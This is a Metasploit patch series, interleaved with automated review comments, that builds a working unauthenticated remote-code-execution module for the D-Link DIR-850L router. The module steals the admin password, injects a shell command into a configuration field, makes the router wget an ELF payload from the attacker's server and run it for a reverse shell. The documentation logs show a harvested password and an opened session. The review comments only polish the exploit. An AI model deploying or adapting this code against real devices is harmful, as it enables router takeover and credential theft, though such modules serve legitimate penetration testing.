@@ -123,7 +113,7 @@ class MetasploitModule < Msf::Exploit::Remote payload << " \r\n" payload << " 1\r\n" payload << " 604800\r\n" - payload << " metelesku; (#{cmd};) & exit; \r\n" + payload << " #{Rex::Text.rand_text_alpha_lower(8)}; (#{cmd}) \r\n" payload << " \r\n" payload << " \r\n" payload << " 1\r\n" @@ -140,13 +130,15 @@ class MetasploitModule < Msf::Exploit::Remote payload << "\r\n" payload << "" begin + # save configuration res = send_request_cgi({ 'uri' => '/hedwig.cgi', 'method' => 'POST', 'ctype' => 'text/xml', 'data' => payload, 'cookie' => "uid=#{uid}" - }) + }) + # execute configuration res = send_request_cgi({ 'uri' => '/pigwidgeon.cgi', 'method' => 'POST', @@ -162,9 +154,7 @@ class MetasploitModule < Msf::Exploit::Remote def exploit print_status("#{peer} - Initiating exploitation...") execute_cmdstager( - :flavor => :wget, - :background => true, - :nodelete => true + :flavor => :wget ) end end From 8c0da8ea9000d0a7fc9d4ff45c8989e5c810fe87 Mon Sep 17 00:00:00 2001 From: Austin <30811388+realoriginal@users.noreply.github.com> Date: Fri, 3 Nov 2017 06:24:07 -0400 Subject: [PATCH 093/254] Update dlink_850l_unauth_exec.rb --- modules/exploits/linux/http/dlink_850l_unauth_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/dlink_850l_unauth_exec.rb b/modules/exploits/linux/http/dlink_850l_unauth_exec.rb index 70e1f8e5db..f718fa85d7 100644 --- a/modules/exploits/linux/http/dlink_850l_unauth_exec.rb +++ b/modules/exploits/linux/http/dlink_850l_unauth_exec.rb @@ -1,7 +1,7 @@ require 'openssl' class MetasploitModule < Msf::Exploit::Remote - Rank = ExcellentRanking + Rank = GreatRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager From 705c1cc6a70fefb05bd62fa1d7bddf05dbc07e66 Mon Sep 17 00:00:00 2001 
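Review bot: In the `@@ -140,13 +130,15 @@` hunk the hedwig.cgi response is assigned to `res` and immediately overwritten by the pigwidgeon.cgi response, so the "save configuration" step can fail silently and the "execute configuration" step is still sent. Either drop the first assignment or check it: `fail_with(Failure::UnexpectedReply, "#{peer} - Config save failed") unless res && res.code == 200` after the first request, and the same check after the second. The two new `# save configuration` / `# execute configuration` comments are helpful and should stay.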
From: Austin <30811388+realoriginal@users.noreply.github.com> Date: Fri, 3 Nov 2017 08:33:42 -0400 Subject: [PATCH 094/254] Redo Functions --- .../linux/http/dlink_850l_unauth_exec.rb | 172 ++++++++++++++++-- 1 file changed, 160 insertions(+), 12 deletions(-) diff --git a/modules/exploits/linux/http/dlink_850l_unauth_exec.rb b/modules/exploits/linux/http/dlink_850l_unauth_exec.rb index f718fa85d7..498c6691ec 100644 --- a/modules/exploits/linux/http/dlink_850l_unauth_exec.rb +++ b/modules/exploits/linux/http/dlink_850l_unauth_exec.rb @@ -1,10 +1,17 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + require 'openssl' class MetasploitModule < Msf::Exploit::Remote - Rank = GreatRanking + Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient - include Msf::Exploit::CmdStager + include Msf::Exploit::Remote::HttpServer + include Msf::Exploit::Remote::EXE + include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, @@ -37,6 +44,14 @@ class MetasploitModule < Msf::Exploit::Remote }, 'Targets' => [[ 'Automatic', {} ]], )) + + register_options( + [ + OptAddress.new('DOWNHOST', [ false, 'An alternative host to requst the ARMLE payload from' ]), + OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]), + OptInt.new('HTTP_DELAY', [ true, 'Time that the HTTP Server will wait for the ELF payload request', 60]), + OptInt.new('CONNECTBACK_DELAY', [ true, 'Time to wait for shell to connect back to attacker', 10]) + ]) end def retrieve_creds 
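Review bot: The `DOWNHOST` description in the `register_options` hunk reads `'An alternative host to requst the ARMLE payload from'`, which has a typo and names the wrong architecture — the module declares `'Arch' => ARCH_MIPSBE` and the rest of the code refers to an ELF payload. Change it to `'An alternative host to request the payload from'`. `DOWNFILE`'s text `'Filename to download, (default: random)'` has a stray comma as well; `'Filename to download (default: random)'` reads cleaner.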
@@ -63,7 +78,7 @@ class MetasploitModule < Msf::Exploit::Remote parse = res.get_xml_document username = parse.at('//name').text password = parse.at('//password').text - vprint_status("#{peer} - Retrieved the username/password combo #{username}/#{password}") + vprint_good("#{peer} - Retrieved the username/password combo #{username}/#{password}") return username, password rescue ::Rex::ConnectionError fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.") @@ -85,8 +100,7 @@ class MetasploitModule < Msf::Exploit::Remote end end - def login - username, password = retrieve_creds + def login(username, password) uid, challenge = retrieve_uid begin hash = OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('md5'), password.to_s, (username.to_s + challenge.to_s)).upcase @@ -102,8 +116,8 @@ class MetasploitModule < Msf::Exploit::Remote end end - def execute_command(cmd, opts) - uid = login + def execute(cmd, username, password) + uid = login(username, password) payload = "\r\n" payload << "\r\n" payload << "\r\n" @@ -113,7 +127,7 @@ class MetasploitModule < Msf::Exploit::Remote payload << " \r\n" payload << " 1\r\n" payload << " 604800\r\n" - payload << " #{Rex::Text.rand_text_alpha_lower(8)}; (#{cmd}) \r\n" + payload << " #{Rex::Text.rand_text_alpha_lower(8)}; (#{cmd}); \r\n" payload << " \r\n" payload << " \r\n" payload << " 1\r\n" @@ -145,6 +159,7 @@ class MetasploitModule < Msf::Exploit::Remote 'data' => 'ACTIONS=SETCFG,ACTIVATE', 'cookie' => "uid=#{uid}" }) + return res rescue ::Rex::ConnectionError fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.") end 
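Review bot: `execute` now ends with `return res`, the raw pigwidgeon.cgi response, so the caller's `if (!res)` only catches a timeout — a 4xx/5xx or an error body still counts as a successful command. Return a value the caller can trust: `return res if res && res.code == 200` followed by `nil`, or call `fail_with` inside `execute` itself. Because `execute(cmd, username, password)` calls `login(username, password)` on every invocation, each command triggers a fresh `retrieve_uid` and authentication round trip; logging in once in `exploit` and passing the `uid` into `execute` would avoid repeated logins against the device. The `vprint_status` → `vprint_good` change is fine.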
@@ -152,9 +167,142 @@ class MetasploitModule < Msf::Exploit::Remote def exploit - print_status("#{peer} - Initiating exploitation...") - execute_cmdstager( - :flavor => :wget - ) + + # + # Information Retrieval, obtains creds and logs in + # + username, password = retrieve_creds + + downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8)) + + @pl = generate_payload_exe + @elf_sent = false + + # HTTP Server + resource_uri = '/' + downfile + if (datastore['DOWNHOST']) + service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri + else + # no ssl... + if datastore['SSL'] + ssl_restore = true + datastore['SSL'] = false + end + + # + # Service URL + # + if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::") + srv_host = Rex::Socket.source_address(rhost) + else + srv_host = datastore['SRVHOST'] + end + + service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri + + # + # Retrieve UID from target after authentication + # + + print_status("#{peer} - Starting up web service #{service_url}") + + start_service({'Uri' => { + 'Proc' => Proc.new { |cli, req| + on_request_uri(cli, req) + }, + 'Path' => resource_uri + }}) + + datastore['SSL'] = true if ssl_restore + end + + + # + # Requests target to download payload + # + print_status("#{peer} - Asking target to request to download #{service_url}") + + filename = rand_text_alpha_lower(8) + + cmd = "wget #{service_url} -O /tmp/#(unknown)" + res = execute(cmd, username, password) + if (!res) + fail_with(Failure::Unknown, "#{peer} - Unable to deploy payload") + end + + if (datastore['DOWNHOST']) + print_status("#{peer} - Giving #{datastore['HTTP_DELAY']} seconds to the device to download the payload") + select(nil, nil, nil, datastore['HTTP_DELAY']) + else + wait_for_linux_payload + end + register_file_for_cleanup("/tmp/#(unknown)") + + + # + # Sets binary permissions to executable + # + cmd = "chmod 777 /tmp/#(unknown)" + print_status("#{peer} 
- Requesting device to chmod #{downfile}") + res = execute(cmd, username, password) + if (!res) + fail_with(Failure::Unknown, "#{peer} - Unable to deploy payload") # fannccyyy + end + + # + # Executes binary on target + # + cmd = "/tmp/#(unknown)" + print_status("#{peer} - Requesting device to execute #{downfile}") + res = execute(cmd, username, password) + if (!res) + fail_with(Failure::Unknown, "#{peer} - Unable to deploy payload") + end + wait_for_connect + end + + + # + # Handler for web server payload delivery + # + def on_request_uri(cli, request) + if (not @pl) + print_error("#{peer} - A request came in, but the payload was not ready") + return + end + print_status("#{peer} - Sending payload to the server...") + @elf_sent = true, + send_response(cli, @pl) + end + + # + # Waits for shell to connect back to us, otherwise server stops and nothing is returned + # + def wait_for_connect + print_status("#{peer} - Waiting for shell to connect back to us...") + waited = 0 + while (@elf_sent) + select(nil, nil, nil, 1) + waited += 1 + if (waited > datastore['CONNECTBACK_DELAY']) + fail_with(Failure::Unknown, "#{peer} - Shell never connected to us!, disconnect?") + end + end + end + + # + # Waits for target to request payload + # + def wait_for_linux_payload + print_status("#{peer} - Waiting for target to request the ELF payload...") + + waited = 0 + while (not @elf_sent) + select(nil, nil, nil, 1) + waited += 1 + if (waited > datastore['HTTP_DELAY']) + fail_with(Failure::Unknown, "#{peer} - Target didn't request the ELF payload - Maybe it can't connect back?") # ;-; + end + end end end From 32a75e978240a5e66d3c940c6941ac8f517f244a Mon Sep 17 00:00:00 2001 From: Austin <30811388+realoriginal@users.noreply.github.com> Date: Fri, 3 Nov 2017 09:02:48 -0400 Subject: [PATCH 095/254] Update dlink_850l_unauth_exec.rb --- .../linux/http/dlink_850l_unauth_exec.rb | 40 +++++++++---------- 1 file changed, 20 insertions(+), 20 deletions(-) 
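Review bot: `@elf_sent = true,` in `on_request_uri` has a trailing comma, so Ruby parses it as `@elf_sent = true, send_response(cli, @pl)` and stores a two-element Array in `@elf_sent`; it only works because an Array is truthy. Remove the comma: `@elf_sent = true` on its own line, then `send_response(cli, @pl)`. Separately, nothing ever clears `@elf_sent`, so `wait_for_connect`'s `while (@elf_sent)` loop always runs out and calls `fail_with(Failure::Unknown, "... Shell never connected to us!, disconnect?")` even when a session has opened — the documentation example shows exactly that sequence; loop on `until session_created?` instead and use `Failure::TimeoutExpired` for the give-up path. `filename = rand_text_alpha_lower(8)` in `exploit` is assigned and never used, and `if (not @pl)` / `while (not @elf_sent)` would be written `unless @pl` / `until @elf_sent` in idiomatic Ruby.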
diff --git a/modules/exploits/linux/http/dlink_850l_unauth_exec.rb b/modules/exploits/linux/http/dlink_850l_unauth_exec.rb index 498c6691ec..168fa8567d 100644 --- a/modules/exploits/linux/http/dlink_850l_unauth_exec.rb +++ b/modules/exploits/linux/http/dlink_850l_unauth_exec.rb @@ -121,26 +121,26 @@ class MetasploitModule < Msf::Exploit::Remote payload = "\r\n" payload << "\r\n" payload << "\r\n" - payload << " DEVICE.TIME\r\n" - payload << " \r\n" - payload << " \r\n" + payload << " DEVICE.TIME\r\n" + payload << " \r\n" + payload << " \r\n" payload << "\r\n" payload << "" begin From 40bcb3f0c8846e67b6ce61758f7115bd91c5b2a5 Mon Sep 17 00:00:00 2001 From: Austin <30811388+realoriginal@users.noreply.github.com> Date: Fri, 3 Nov 2017 09:09:51 -0400 Subject: [PATCH 096/254] update documentation --- .../linux/http/dlink_dir850l_unauth_exec.md | 53 +++++++++++++++---- 1 file changed, 44 insertions(+), 9 deletions(-) diff --git a/documentation/modules/exploit/linux/http/dlink_dir850l_unauth_exec.md b/documentation/modules/exploit/linux/http/dlink_dir850l_unauth_exec.md index dc8863c9d1..fac596348e 100644 --- a/documentation/modules/exploit/linux/http/dlink_dir850l_unauth_exec.md +++ b/documentation/modules/exploit/linux/http/dlink_dir850l_unauth_exec.md @@ -16,7 +16,7 @@ are potentially vulnerable. The vulneralbility seems to occur within the parsing ## Example ``` -msf > use exploit/linux/http/dlink_850l_unauth_exec +msf > use exploit/linux/http/dlink_dir850l_unauth_exec msf exploit(dlink_850l_unauthenticated_exec) > set RHOST 192.168.0.14 RHOST => 192.168.0.14 msf exploit(dlink_850l_unauthenticated_exec) > set RPORT 80 
@@ -26,15 +26,50 @@ LHOST => ens3 msf exploit(dlink_850l_unauthenticated_exec) > set LPORT 1351 LPORT => 1351 msf exploit(dlink_850l_unauthenticated_exec) > run +[*] Exploit running as background job 0. [*] Started reverse TCP handler on 192.168.0.11:1351 -[*] 192.168.0.14:80 - Initiating exploitation... -[*] Using URL: http://0.0.0.0:80/Muw2WNUEmsAlcdl -[*] Local IP: http://192.168.0.11:80/Muw2WNUEmsAlcdl -[*] 192.168.0.14:80 - Retrieving uid and auth challenge... -[*] Command Stager progress - 100.00% done (101/101 bytes) -[*] Client 192.168.0.14 (Wget) requested /Muw2WNUEmsAlcdl -[*] Sending payload to 192.168.0.14 (Wget) -[*] Command shell session 2 opened (192.168.0.11:1351 -> 192.168.0.14:55167) at 2017-11-02 15:37:06 -0400 +msf exploit(dlink_850l_unauthenticated_exec) > [*] 192.168.0.14:80 - Starting up web service http://192.168.0.11:80/kiRtmoNlSNHUnxO +[*] Using URL: http://0.0.0.0:80/kiRtmoNlSNHUnxO +[*] Local IP: http://192.168.0.11:80/kiRtmoNlSNHUnxO +[*] 192.168.0.14:80 - Asking target to request to download http://192.168.0.11:80/kiRtmoNlSNHUnxO +[*] 192.168.0.14:80 - Waiting for target to request the ELF payload... +[*] 192.168.0.14:80 - Sending payload to the server... +[*] 192.168.0.14:80 - Requesting device to chmod kiRtmoNlSNHUnxO +[*] 192.168.0.14:80 - Requesting device to execute kiRtmoNlSNHUnxO +[*] 192.168.0.14:80 - Waiting for shell to connect back to us... +[*] Sending stage (84 bytes) to 192.168.0.14 +[*] Command shell session 1 opened (192.168.0.11:1351 -> 192.168.0.14:48679) at 2017-11-03 09:05:13 -0400 +[+] Deleted /tmp/dhufstzw +sessions -i 1 +[*] Starting interaction with 1... + +3353690789 +yBvPAaTjxEjNJrrzHHdFNXGNWNywfECC +true +MhhOHvSRnLmxcFwdTiIdZFcHzGRAIhlA +mMzxldJdkNYWlIrHrOazzOcpCRTuRipt +OayNFBMDfTSaJIFwpNPoWErXCvLmIguK +[-] Exploit aborted due to failure: unknown: 192.168.0.14:80 - Shell never connected to us!, disconnect? [*] Server stopped. 
+pwd +/ +ls +www +var +usr +tmp +sys +sbin +proc +mydlink +mnt +lib +include +htdocs +home +etc +dev +bin + ``` From deb5a7b0151a8775f462ddce73c229940fb4dc1b Mon Sep 17 00:00:00 2001 From: Metasploit Date: Fri, 3 Nov 2017 10:03:38 -0700 Subject: [PATCH 097/254] Bump version of framework to 4.16.16 --- Gemfile.lock | 4 ++-- lib/metasploit/framework/version.rb | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index 4d5a45de98..024c7dca5d 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -1,7 +1,7 @@ PATH remote: . specs: - metasploit-framework (4.16.15) + metasploit-framework (4.16.16) actionpack (~> 4.2.6) activerecord (~> 4.2.6) activesupport (~> 4.2.6) @@ -143,7 +143,7 @@ GEM googleapis-common-protos-types (~> 1.0.0) googleauth (>= 0.5.1, < 0.7) hashery (2.1.2) - i18n (0.9.0) + i18n (0.9.1) concurrent-ruby (~> 1.0) jsobfu (0.4.2) rkelly-remix diff --git a/lib/metasploit/framework/version.rb b/lib/metasploit/framework/version.rb index 88b837dc2f..ab016eefbe 100644 --- a/lib/metasploit/framework/version.rb +++ b/lib/metasploit/framework/version.rb @@ -30,7 +30,7 @@ module Metasploit end end - VERSION = "4.16.15" + VERSION = "4.16.16" MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i } PRERELEASE = 'dev' HASH = get_hash From cddec8ca6c53a2c995cce9f4693f79a2d2edd03a Mon Sep 17 00:00:00 2001 From: Austin <30811388+realoriginal@users.noreply.github.com> Date: Fri, 3 Nov 2017 14:24:45 -0400 Subject: [PATCH 098/254] download creds, stores in loot. --- .../linux/http/dlink_850l_unauth_exec.rb | 31 ++++++++++++++++++- 1 file changed, 30 insertions(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/dlink_850l_unauth_exec.rb b/modules/exploits/linux/http/dlink_850l_unauth_exec.rb index 168fa8567d..f2b7489fd1 100644 --- a/modules/exploits/linux/http/dlink_850l_unauth_exec.rb +++ b/modules/exploits/linux/http/dlink_850l_unauth_exec.rb 
@@ -11,6 +11,7 @@ class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer include Msf::Exploit::Remote::EXE + include Msf::Auxiliary::Report include Msf::Exploit::FileDropper def initialize(info = {}) @@ -54,6 +55,32 @@ class MetasploitModule < Msf::Exploit::Remote ]) end + def report_cred(opts) + service_data = { + address: opts[:ip], + port: opts[:port], + service_name: opts[:service_name], + protocol: 'tcp', + workspace_id: myworkspace_id + } + + credential_data = { + origin_type: :service, + module_fullname: fullname, + username: opts[:user], + private_data: opts[:password], + private_type: :password + }.merge(service_data) + + login_data = { + core: create_credential(credential_data), + status: Metasploit::Model::Login::Status::UNTRIED, + proof: opts[:proof] + }.merge(service_data) + + create_credential_login(login_data) + end + def retrieve_creds begin xml = "\r\n" @@ -79,6 +106,8 @@ class MetasploitModule < Msf::Exploit::Remote username = parse.at('//name').text password = parse.at('//password').text vprint_good("#{peer} - Retrieved the username/password combo #{username}/#{password}") + loot = store_loot("dlink.dir850l.login", "text/plain", rhost, res.body) + print_good("#{peer} - Downloaded credentials to #{loot}") return username, password rescue ::Rex::ConnectionError fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.") @@ -104,7 +133,7 @@ class MetasploitModule < Msf::Exploit::Remote uid, challenge = retrieve_uid begin hash = OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('md5'), password.to_s, (username.to_s + challenge.to_s)).upcase - res = send_request_cgi({ + send_request_cgi({ 'uri' => '/authentication.cgi', 'method' => 'POST', 'data' => "id=#{username}&password=#{hash}", From 84599ed3fc4a0153de5aff808aef4c163abb6776 Mon Sep 17 00:00:00 2001 
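Review bot: `report_cred` is added along with `include Msf::Auxiliary::Report`, but nothing calls it — `retrieve_creds` only prints the pair and writes the raw body to loot via `store_loot`, so the recovered login never reaches the credential store. After the `store_loot` call, add `report_cred(ip: rhost, port: rport, service_name: 'http', user: username, password: password, proof: res.body)`; the keys match what `report_cred` reads from `opts`. A one-line comment above `report_cred` noting that it records the device's web login as an untried credential would also help the next reader.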
From: Austin <30811388+realoriginal@users.noreply.github.com> Date: Sat, 4 Nov 2017 07:58:13 -0400 Subject: [PATCH 099/254] Update dlink_850l_unauth_exec.rb --- .../linux/http/dlink_850l_unauth_exec.rb | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) diff --git a/modules/exploits/linux/http/dlink_850l_unauth_exec.rb b/modules/exploits/linux/http/dlink_850l_unauth_exec.rb index f2b7489fd1..cd6cc8f7ad 100644 --- a/modules/exploits/linux/http/dlink_850l_unauth_exec.rb +++ b/modules/exploits/linux/http/dlink_850l_unauth_exec.rb @@ -54,6 +54,28 @@ class MetasploitModule < Msf::Exploit::Remote OptInt.new('CONNECTBACK_DELAY', [ true, 'Time to wait for shell to connect back to attacker', 10]) ]) end + + def check + begin + res = send_request_cgi({ + 'uri' => '/', + 'method' => 'GET' + }) + if res && res.headers['Server'] + auth = res.headers['Server'] + if auth =~ /DIR-850L/ + if auth =~ /WEBACCESS\/1\.0/ + return Exploit::CheckCode::Safe + else + return Exploit::CheckCode::Detected + end + end + end + rescue ::Rex::ConnectionError + return Exploit::CheckCode::Unknown + end + Exploit::CheckCode::Unknown + end def report_cred(opts) service_data = { @@ -196,7 +218,13 @@ class MetasploitModule < Msf::Exploit::Remote def exploit + + print_status("#{peer} - Connecting to target...") + unless check == Exploit::CheckCode::Detected + fail_with(Failure::Unknown, "#{peer} - Failed to access vulnerable url") + end + # # Information Retrieval, obtains creds and logs in # From e783cb59ead15781f79364bfad7f8380fc8fa4cf Mon Sep 17 00:00:00 2001 From: Austin <30811388+realoriginal@users.noreply.github.com> Date: Sat, 4 Nov 2017 08:53:50 -0400 Subject: [PATCH 100/254] add "check" & msftidy --- modules/exploits/linux/http/dlink_850l_unauth_exec.rb | 8 +++----- 1 file changed, 3 insertions(+), 5 deletions(-) diff --git a/modules/exploits/linux/http/dlink_850l_unauth_exec.rb b/modules/exploits/linux/http/dlink_850l_unauth_exec.rb index cd6cc8f7ad..cd8fe1b141 100644 
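Review bot: In `check`, the `Safe` verdict rests solely on the `Server` header containing `WEBACCESS/1.0`; if that banner is known to mark patched firmware, say so in a comment above the test, otherwise `CheckCode::Detected` is the honest answer for a banner-only check. The local is named `auth` but holds the `Server` header — `server_hdr` would be clearer — and the three nested `if`s can be flattened with guard returns (`return Exploit::CheckCode::Unknown unless res && res.headers['Server']`). In `exploit`, `unless check == Exploit::CheckCode::Detected` turns both `Safe` and `Unknown` into `"Failed to access vulnerable url"`, which is misleading for a host that was reached and judged patched; branch on the result and use `Failure::NotVulnerable` for the `Safe` case.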
--- a/modules/exploits/linux/http/dlink_850l_unauth_exec.rb +++ b/modules/exploits/linux/http/dlink_850l_unauth_exec.rb @@ -51,10 +51,10 @@ class MetasploitModule < Msf::Exploit::Remote OptAddress.new('DOWNHOST', [ false, 'An alternative host to requst the ARMLE payload from' ]), OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]), OptInt.new('HTTP_DELAY', [ true, 'Time that the HTTP Server will wait for the ELF payload request', 60]), - OptInt.new('CONNECTBACK_DELAY', [ true, 'Time to wait for shell to connect back to attacker', 10]) + OptInt.new('CONNECTBACK_DELAY', [ true, 'Time to wait for shell to connect back to listener', 10]) ]) end - + def check begin res = send_request_cgi({ @@ -218,13 +218,11 @@ class MetasploitModule < Msf::Exploit::Remote def exploit - print_status("#{peer} - Connecting to target...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access vulnerable url") end - # # Information Retrieval, obtains creds and logs in # @@ -336,7 +334,7 @@ class MetasploitModule < Msf::Exploit::Remote # Waits for shell to connect back to us, otherwise server stops and nothing is returned # def wait_for_connect - print_status("#{peer} - Waiting for shell to connect back to us...") + print_status("#{peer} - Waiting #{datastore['CONNECTBACK_DELAY'].to_s} seconds for shell to connect back to us...") waited = 0 while (@elf_sent) select(nil, nil, nil, 1) From 646c7f7c0a528e98f1e8cd122c45d5aa7e54eddd Mon Sep 17 00:00:00 2001 From: Austin <30811388+realoriginal@users.noreply.github.com> Date: Sat, 4 Nov 2017 11:40:32 -0400 Subject: [PATCH 101/254] update doc --- .../linux/http/dlink_dir850l_unauth_exec.md | 79 ++++++++----------- 1 file changed, 34 insertions(+), 45 deletions(-) diff --git a/documentation/modules/exploit/linux/http/dlink_dir850l_unauth_exec.md b/documentation/modules/exploit/linux/http/dlink_dir850l_unauth_exec.md index fac596348e..a1158fa395 100644 
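Review bot: `#{datastore['CONNECTBACK_DELAY'].to_s}` in the new `wait_for_connect` message has a redundant `.to_s` — string interpolation already calls it — so `#{datastore['CONNECTBACK_DELAY']}` suffices. The `@@ -51,10 +51,10 @@` hunk corrects the `CONNECTBACK_DELAY` wording but leaves the adjacent `DOWNHOST` description `'An alternative host to requst the ARMLE payload from'` untouched, which still carries a typo and names an architecture this MIPSBE module does not use.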
--- a/documentation/modules/exploit/linux/http/dlink_dir850l_unauth_exec.md +++ b/documentation/modules/exploit/linux/http/dlink_dir850l_unauth_exec.md @@ -8,7 +8,7 @@ are potentially vulnerable. The vulneralbility seems to occur within the parsing 1. Start msfconsole 2. Do : `use exploit/linux/http/dlink_dir850l_unauth_exec.rb` 3. Do : `set RHOST [RouterIP]` - 4. Do : `set PAYLOAD linux/mipsle/shell/reverse_tcp` + 4. Do : `set PAYLOAD linux/mipsbe/shell/reverse_tcp` 5. Do : `run` 6. If router is vulnerable, payload should be dropped via wget and executed, and therein should obtain an session 
@@ -17,59 +17,48 @@ are potentially vulnerable. The vulneralbility seems to occur within the parsing ``` msf > use exploit/linux/http/dlink_dir850l_unauth_exec -msf exploit(dlink_850l_unauthenticated_exec) > set RHOST 192.168.0.14 +msf exploit(dlink_dir850l_unauth_exec) > set RHOST 192.168.0.14 RHOST => 192.168.0.14 -msf exploit(dlink_850l_unauthenticated_exec) > set RPORT 80 +msf exploit(dlink_dir850l_unauth_exec) > set RPORT 80 RPORT => 80 -msf exploit(dlink_850l_unauthenticated_exec) > set LHOST ens3 +msf exploit(dlink_dir850l_unauth_exec) > check +[*] 192.168.0.14:80 The target service is running, but could not be validated. +msf exploit(dlink_dir850l_unauth_exec) > set VERBOSE true +VERBOSE => true +msf exploit(dlink_dir850l_unauth_exec) > set LHOST ens3 LHOST => ens3 -msf exploit(dlink_850l_unauthenticated_exec) > set LPORT 1351 -LPORT => 1351 -msf exploit(dlink_850l_unauthenticated_exec) > run -[*] Exploit running as background job 0. +msf exploit(dlink_dir850l_unauth_exec) > set LPORT 3131 +LPORT => 3131 +msf exploit(dlink_dir850l_unauth_exec) > run -[*] Started reverse TCP handler on 192.168.0.11:1351 -msf exploit(dlink_850l_unauthenticated_exec) > [*] 192.168.0.14:80 - Starting up web service http://192.168.0.11:80/kiRtmoNlSNHUnxO -[*] Using URL: http://0.0.0.0:80/kiRtmoNlSNHUnxO -[*] Local IP: http://192.168.0.11:80/kiRtmoNlSNHUnxO -[*] 192.168.0.14:80 - Asking target to request to download http://192.168.0.11:80/kiRtmoNlSNHUnxO +[*] Started reverse TCP handler on 192.168.0.11:3131 +[*] 192.168.0.14:80 - Connecting to target... 
+[+] 192.168.0.14:80 - Retrieved the username/password combo Admin/92830535 +[+] 192.168.0.14:80 - Downloaded credentials to /root/.msf4/loot/20171104113614_default_192.168.0.14_dlink.dir850l.lo_146186.txt +[*] 192.168.0.14:80 - Starting up web service http://192.168.0.11:8080/ZUrlVeWUm +[*] Using URL: http://0.0.0.0:8080/ZUrlVeWUm +[*] Local IP: http://192.168.0.11:8080/ZUrlVeWUm +[*] 192.168.0.14:80 - Asking target to request to download http://192.168.0.11:8080/ZUrlVeWUm [*] 192.168.0.14:80 - Waiting for target to request the ELF payload... [*] 192.168.0.14:80 - Sending payload to the server... -[*] 192.168.0.14:80 - Requesting device to chmod kiRtmoNlSNHUnxO -[*] 192.168.0.14:80 - Requesting device to execute kiRtmoNlSNHUnxO -[*] 192.168.0.14:80 - Waiting for shell to connect back to us... +[*] 192.168.0.14:80 - Requesting device to chmod ZUrlVeWUm +[*] 192.168.0.14:80 - Requesting device to execute ZUrlVeWUm +[*] 192.168.0.14:80 - Waiting 10 seconds for shell to connect back to us... [*] Sending stage (84 bytes) to 192.168.0.14 -[*] Command shell session 1 opened (192.168.0.11:1351 -> 192.168.0.14:48679) at 2017-11-03 09:05:13 -0400 -[+] Deleted /tmp/dhufstzw -sessions -i 1 -[*] Starting interaction with 1... - -3353690789 -yBvPAaTjxEjNJrrzHHdFNXGNWNywfECC -true -MhhOHvSRnLmxcFwdTiIdZFcHzGRAIhlA -mMzxldJdkNYWlIrHrOazzOcpCRTuRipt -OayNFBMDfTSaJIFwpNPoWErXCvLmIguK +[*] Command shell session 1 opened (192.168.0.11:3131 -> 192.168.0.14:43953) at 2017-11-04 11:36:26 -0400 +[+] Deleted /tmp/uoskutcy [-] Exploit aborted due to failure: unknown: 192.168.0.14:80 - Shell never connected to us!, disconnect? [*] Server stopped. +[*] Exploit completed, but no session was created. +msf exploit(dlink_dir850l_unauth_exec) > sessions -i 1 +[*] Starting interaction with 1... 
+ +190745749 +wUVNdEKSrgeaxdSQyfTyxvaoYgFzyvGj +true +pQfaUhhwMvgnWrLpQXhhUAioNBFHPRZP +OgkEaOTPYbUEOLlLpLFEbodBvHFmVRmH +iNaYBrmsZqFyolPWWRKEHsKglrSlSGkY pwd / -ls -www -var -usr -tmp -sys -sbin -proc -mydlink -mnt -lib -include -htdocs -home -etc -dev -bin - ``` From 724c5fb963ad1c8100c7faafd5d4fa97e3be373e Mon Sep 17 00:00:00 2001 From: Austin <30811388+realoriginal@users.noreply.github.com> Date: Sat, 4 Nov 2017 11:41:07 -0400 Subject: [PATCH 102/254] finish --- modules/exploits/linux/http/dlink_850l_unauth_exec.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/modules/exploits/linux/http/dlink_850l_unauth_exec.rb b/modules/exploits/linux/http/dlink_850l_unauth_exec.rb index cd8fe1b141..3cc3e212ce 100644 --- a/modules/exploits/linux/http/dlink_850l_unauth_exec.rb +++ b/modules/exploits/linux/http/dlink_850l_unauth_exec.rb @@ -32,6 +32,7 @@ class MetasploitModule < Msf::Exploit::Remote ['URL', 'https://blogs.securiteam.com/index.php/archives/3310'], ], 'DisclosureDate' => 'Aug 9 2017', + 'Stance' => Msf::Exploit::Stance::Aggressive, 'License' => MSF_LICENSE, 'Platform' => 'linux', 'Arch' => ARCH_MIPSBE, From 1758ed93d47545fe5e87e7c9b451001fef4a6bc6 Mon Sep 17 00:00:00 2001 From: Austin <30811388+realoriginal@users.noreply.github.com> Date: Sat, 4 Nov 2017 11:42:49 -0400 Subject: [PATCH 103/254] Update dlink_850l_unauth_exec.rb --- modules/exploits/linux/http/dlink_850l_unauth_exec.rb | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/modules/exploits/linux/http/dlink_850l_unauth_exec.rb b/modules/exploits/linux/http/dlink_850l_unauth_exec.rb index 3cc3e212ce..89488d54fc 100644 --- a/modules/exploits/linux/http/dlink_850l_unauth_exec.rb +++ b/modules/exploits/linux/http/dlink_850l_unauth_exec.rb 
